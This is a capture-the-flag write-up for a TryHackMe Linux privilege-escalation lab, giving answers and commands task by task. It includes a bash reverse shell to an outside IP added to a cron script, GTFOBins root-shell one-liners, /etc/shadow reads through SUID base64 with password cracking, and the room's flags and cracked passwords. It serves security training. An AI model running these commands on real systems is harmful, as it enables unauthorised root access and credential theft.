Skip to content

TryHackMe Writeups

Linprivesc

TryHackMe Writeups

Home
Crackthehash
Cyberadventtemplate
Template
25daysofchristmas
25daysofchristmas
- 25daysofchristmas
HackfinityBattle
HackfinityBattle
- HackfinityBattle
Adenumeration
Adenumeration
- Adenumeration
Adv3nt0fdbopsjcap
Adv3nt0fdbopsjcap
- Adv3nt0fdbopsjcap
Adventofcyber2
Adventofcyber2
- Adventofcyber2
Adventofcyber2023
Adventofcyber2023
- Adventofcyber2023
Adventofcyber2024
Adventofcyber2024
- Adventofcyber2024
Adventofcyber23sidequest
Adventofcyber23sidequest
- Adventofcyber23sidequest
Agentsudoctf
Agentsudoctf
- Agentsudoctf
Anonymous
Anonymous
- Anonymous
Auditingandmonitoringse
Auditingandmonitoringse
- Auditingandmonitoringse
Authenticationbypass
Authenticationbypass
- Authenticationbypass
Blaster
Blaster
- Blaster
Blue
Blue
- Blue
Bof1
Bof1
- Bof1
Breachingad
Breachingad
- Breachingad
Breakrsa
Breakrsa
- Breakrsa
Burpsuitebasics
Burpsuitebasics
- Burpsuitebasics
Burpsuiteintruder
Burpsuiteintruder
- Burpsuiteintruder
Burpsuiteom
Burpsuiteom
- Burpsuiteom
Burpsuiterepeater
Burpsuiterepeater
- Burpsuiterepeater
Codeanalysis
Codeanalysis
- Codeanalysis
Commonlinuxprivesc
Commonlinuxprivesc
- Commonlinuxprivesc
Contentdiscovery
Contentdiscovery
- Contentdiscovery
Cowboyhacker
Cowboyhacker
- Cowboyhacker
Crackthehash
Crackthehash
- Crackthehash
Cryptographyintro
Cryptographyintro
- Cryptographyintro
Cybergovernanceregulation
Cybergovernanceregulation
- Cybergovernanceregulation
Dastzap
Dastzap
- Dastzap
Dataxexfilt
Dataxexfilt
- Dataxexfilt
Easyctf
Easyctf
- Easyctf
Encryptioncrypto101
Encryptioncrypto101
- Encryptioncrypto101
Enumerationpe
Enumerationpe
- Enumerationpe
Exploitingad
Exploitingad
- Exploitingad
Fileinc
Fileinc
- Fileinc
Hydra
Hydra
- Hydra
Ice
Ice
- Ice
Intronetworksecurity
Intronetworksecurity
- Intronetworksecurity
Johntheripper0
Johntheripper0
- Johntheripper0
Kenobi
Kenobi
- Kenobi
Lateralmovementandpivoting
Lateralmovementandpivoting
- Lateralmovementandpivoting
Linprivesc
Linprivesc
- Linprivesc Linprivesc
  Table of contents
  - Table of contents
    
    Enumeration
    
    Automated Enumeration Tools
    
    Privilege Escalation: Kernel Exploits
    
    Privilege Escalation: Sudo
    
    Privilege Escalation: SUID
    
    Privilege Escalation: Capabilities
    
    Privilege Escalation: Cron Jobs
    
    Privilege Escalation: PATH
    
    Privilege Escalation: NFS
    
    Capstone Challenge
Linuxfundamentalspart1
Linuxfundamentalspart1
- Linuxfundamentalspart1
Linuxfundamentalspart2
Linuxfundamentalspart2
- Linuxfundamentalspart2
Linuxfundamentalspart3
Linuxfundamentalspart3
- Linuxfundamentalspart3
Linuxprivesc
Linuxprivesc
- Linuxprivesc
Linuxsystemhardening
Linuxsystemhardening
- Linuxsystemhardening
Malmalintroductory
Malmalintroductory
- Malmalintroductory
Metasploitexploitation
Metasploitexploitation
- Metasploitexploitation
Meterpreter
Meterpreter
- Meterpreter
Netsecchallenge
Netsecchallenge
- Netsecchallenge
Ohsint
Ohsint
- Ohsint
Operatingsystemsecurity
Operatingsystemsecurity
- Operatingsystemsecurity
Owaspjuiceshop
Owaspjuiceshop
- Owaspjuiceshop
Owasptop102021
Owasptop102021
- Owasptop102021
Passwordattacks
Passwordattacks
- Passwordattacks
Persistingad
Persistingad
- Persistingad
Picklerick
Picklerick
- Picklerick
Postexploit
Postexploit
- Postexploit
Powershell
Powershell
- Powershell
Printerhacking101
Printerhacking101
- Printerhacking101
Redteamrecon
Redteamrecon
- Redteamrecon
Rpnessusredux
Rpnessusredux
- Rpnessusredux
Rrootme
Rrootme
- Rrootme
Sast
Sast
- Sast
Seriskmanagement
Seriskmanagement
- Seriskmanagement
Shodan
Shodan
- Shodan
Sql injection
Sql injection
- Sql injection
Steelmountain
Steelmountain
- Steelmountain
Thelayoftheland
Thelayoftheland
- Thelayoftheland
Threatmodelling
Threatmodelling
- Threatmodelling
Traverse
Traverse
- Traverse
Uploadvulns
Uploadvulns
- Uploadvulns
Vulnerabilitycapstone
Vulnerabilitycapstone
- Vulnerabilitycapstone
Vulnerabilitymanagementkj
Vulnerabilitymanagementkj
- Vulnerabilitymanagementkj
Vulnversity
Vulnversity
- Vulnversity
Walkinganapplication
Walkinganapplication
- Walkinganapplication
Weaponization
Weaponization
- Weaponization
Winadbasics
Winadbasics
- Winadbasics
Windows10privesc
Windows10privesc
- Windows10privesc
Windowsfundamentals1
Windowsfundamentals1
- Windowsfundamentals
Windowsfundamentals2
Windowsfundamentals2
- Windowsfundamentals2
Windowsfundamentals3
Windowsfundamentals3
- Windowsfundamentals3
Windowslocalpersistence
Windowslocalpersistence
- Windowslocalpersistence
Windowsprivesc20
Windowsprivesc20
- Windowsprivesc20
Wiresharkpacketoperations
Wiresharkpacketoperations
- Wiresharkpacketoperations
Wiresharkthebasics
Wiresharkthebasics
- Wiresharkthebasics
Wonderland
Wonderland
- Wonderland

Linux Privilege Escalation Banner

Linux Privilege Escalation Logo

Linux Privilege Escalation

This guide contains the answer and steps necessary to get to them for the Linux Privilege Escalation room.

Table of contents

Enumeration
Automated Enumeration Tools
Privilege Escalation: Kernel Exploits
Privilege Escalation: Sudo
Privilege Escalation: SUID
Privilege Escalation: Capabilities
Privilege Escalation: Cron Jobs
Privilege Escalation: PATH
Privilege Escalation: NFS
Capstone Challenge

Enumeration

What is the hostname of the target system?

Click for answer
wade7363

What is the Linux kernel version of the target system?

Click for answer
3.13.0-24-generic

What Linux is this?

Click for answer
Ubuntu 14.04 LTS

What version of the Python language is installed on the system?

Click for answer
2.7.6

What vulnerability seem to affect the kernel of the target system? (Enter a CVE number)

Click for answer
CVE-2015-1328

Automated Enumeration Tools

Privilege Escalation: Kernel Exploits

Find and use the appropriate kernel exploit to gain root privileges on the target system.

We first need to find the kernel version on this system with uname -a.

Version

Then we can look for an exploit for this kernel through Exploit Database for example.

Exploit

Now we can either download the file from here or locate it on our machine through the file name.

What is the content of the flag1.txt file?

I will first rename the file to exploit.c.

mv 37292.c exploit.c

Then we set up a web server on our machine to deliver the file.

python3 -m http.server 8080

In the temp folder we can download the exploit.

wget 10.18.78.136:8080/exploit.c

Prepare

Now we should compile the file.

gcc exploit.c -o exploit

Success

Lastly, we need to search for the flag and read it!

find / -name flag1.txt 2>/dev/null

cat /home/matt/flag1.txt

Flag

Click for answer
THM-28392872729920

Privilege Escalation: Sudo

How many programs can the user "karen" run on the target system with sudo rights?

We can find that out with: sudo -l.

Permissions

Click for answer
3

What is the content of the flag2.txt file?

We first locate the flag with:

find / -name flag2.txt 2>/dev/null

Location

To read the flag we can use either less or nano.

sudo less /home/ubuntu/flag2.txt

sudo nano /home/ubuntu/flag2.txt

Flag

P.s. It turned out permission weren't even needed to read the flag..

Click for answer
THM-402028394

How would you use Nmap to spawn a root shell if your user had sudo rights on nmap?

This can be found on the GTFOBins website whilst searching for nmap.

Click for answer
sudo nmap --interactive

What is the hash of frank's password?

To do this we exploit the nmap sudo permissions to read the shadow file.

sudo nano /etc/shadow

Hashes

Click for answer
$6$2.sUUDsOLIpXKxcr$eImtgFExyr2ls4jsghdD3DHLHHP9X50Iv.jNmwo/BJpphrPRJWjelWEz2HH.joV14aDEwW1c3CahzB1uaqeLR1

Privilege Escalation: SUID

Which user shares the name of a great comic book writer?

This we can find in the passwd file. This can be opened without any permissions. So we can use any means we want.

Writer

Copy to contents to a file.

Click for answer
gerryconway

What is the password of user2?

First we need to find which binary with a set SUID bit we can use.

find / -type f -perm -4000 2>/dev/null

Bin

Looks like we can use base64. Let's us it to copy the contents of the shadow file.

/usr/bin/base64 "/etc/shadow" | base64 --decode

Shadow

Now we join these two files with unshadow.

unshadow passwd.txt shadow.txt > passwords.txt

Finally, we use john to crack the password.

john passwords.txt --wordlist=/usr/share/wordlists/rockyou.txt

Passwords

Click for answer
Password1

What is the content of the flag3.txt file?

We can use the same method as before, but with a different file. Searching for the flag gives us its location.

find / -name flag3.txt 2>/dev/null
/home/ubuntu/flag3.txt

/usr/bin/base64 "/home/ubuntu/flag3.txt" | base64 --decode

Flag

Click for answer
THM-3847834

Privilege Escalation: Capabilities

How many binaries have set capabilities?

Using getcap -r we can see which binaries have capabilities set.

getcap -r / 2>/dev/null

CAPABILITIES SET

Click for answer
6

What other binary can be used through its capabilities?

Comparing our previous binary list on GTFObins should give us the answer.

Set

Click for answer
view

What is the content of the flag4.txt file?

First we look for the flag using:

find /home -name flag4.txt 2>/dev/null

Apparently, we can read the file without root access.

Flag

Lets try the escalation our privileges anyway using the view binary. For this to work we need to use the path we identified in the first image. Then use the following command:

/home/ubuntu/view -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

This gives us a root shell that we can leverage.

Root

Click for answer
THM-9349843

Privilege Escalation: Cron Jobs

How many user-defined cron jobs can you see on the target system?

Using the following command we can list all existing cronjobs:

cat /etc/crontab

Tab

Click for answer
4

What is the content of the flag5.txt file?

We have found a script we can alter (backup.sh). Lets add a simple tcp reverse shell using bash taken from PayloadAllTheThings.

bash -i >& /dev/tcp/10.18.78.136/1337 0>&1

Script

As the shell didn't work at first, I had to check its permissions with ls -lh. This showed the file wasn't executale.

Permissions

Using chmod +x backup.sh would fix this.

Now we set up a listener on our machine and wait.

nc -nlvp 1337

Once the connection is made, we can look for the flag.

Flag

Click for answer
THM-383000283

What is Matt's password?

To do this we need his password hash. This can be done by viewing the shadow file.

cat /etc/shadow | grep "matt"

Hash

Now we can plug this into John the Ripper to crack the password itself (using sha512crypt as the format).

john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt  matpass.hash

Password

Click for answer
123456

Privilege Escalation: PATH

What is the odd folder you have write access for?

To find all writable folder we can use the following command. We will also look for subfolders, as that is shown in the answer.

find / -writable 2>/dev/null | cut -d "/" -f 2,3 | sort -u

Click for answer
/home/murdoch

Exploit the $PATH vulnerability to read the content of the flag6.txt file.

What is the content of the flag6.txt file?

Lets check were the flag files i located.

find / -name flag6* 2>/dev/null

/home/matt/flag6.txt.

We found the test file to be present in the home folder of Murdoch. so we need to add it to the PATH variable. As well as creating a thm file with a command to read the flag.

export PATH=/home/murdoch:$PATH

echo "cat /home/matt/flag6.txt" > thm

Path Prep

Now we must make the file executable and run the test file.

chmod +x thm

./test

Path Flag

Click for answer
THM-736628929

Privilege Escalation: NFS

How many mountable shares can you identify on the target system?

showmount -e 10.10.6.120

NFS Shares

Click for answer
3

How many shares have the "no_root_squash" option enabled?

cat /etc/exports

NFS Squash

Click for answer
3

Gain a root shell on the target system

What is the content of the flag7.txt file?

For this we will mount the /tmp folder to our system and add a binary that will give us root access.

mkdir /tmp/sharedtmpfolder
mount -o rw 10.10.253.205:/tmp /tmp/sharedtmpfolder

vi nfs.c
chmod +x
gcc nfs.c -o nfs -w

NFS Script

Unfortunately, I would get errors messages when trying to compile to file. In the end this just didn't seem to work on my system.

Click for answer

Capstone Challenge

What is the content of the flag1.txt file?

First thing to do is to locate the flags. Unfortunately, the search didn't reveal anything. Probably, because our account is not allowed to look into other users folders.

find / -name flag* 2>/dev/null

After enumerating multiple entry vectors, the SUID method seems to work. Using the following command we see we can abuse base64 to read files we aren't allowed to.

find / -type f -perm -4000 2>/dev/null

Suid

Using GTFOBins, we can see how we can read such files.

Suid Gtfo

Unfortunately, we don't know the location of the flags yet, but we can try and read the shadow file.

/usr/bin/base64 "/etc/shadow" | base64 --decode

Shadow

Cracking missy's hash with John gives us her password (unfortunately we couldn't crack roots password).

john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt  missyhash.hash

Results -> Password1

After switching the missy's account using su missy we can look for any of the flags again. Looks like there is one located at /home/missy/Documents/flag1.txt.

This flag we can actually read now.

Flag1

Click for answer
THM-42828719920544

What is the content of the flag2.txt file?

The second flag is probably located in /home/rootflag, so we will probably need root access for this one.

After searching for a long time, I couldn't find anything. But then I re-checked missy to see if she could run anything with sudo.

sudo -l

Apparently, she can use find with sudo. We can use the following command to find the second flag:

sudo find /home -name flag* 2>/dev/null

Flag Location

We can now either use the same base64 exploit to read the flag or we can escalate our privileges to root with the find binary.

/usr/bin/base64 "/home/rootflag/flag2.txt" | base64 --decode

Flag2 Base

Or

sudo find . -exec /bin/sh \; -quit

cat /home/rootflag/flag2.txt

Flag2 Root

Click for answer
THM-168824782390238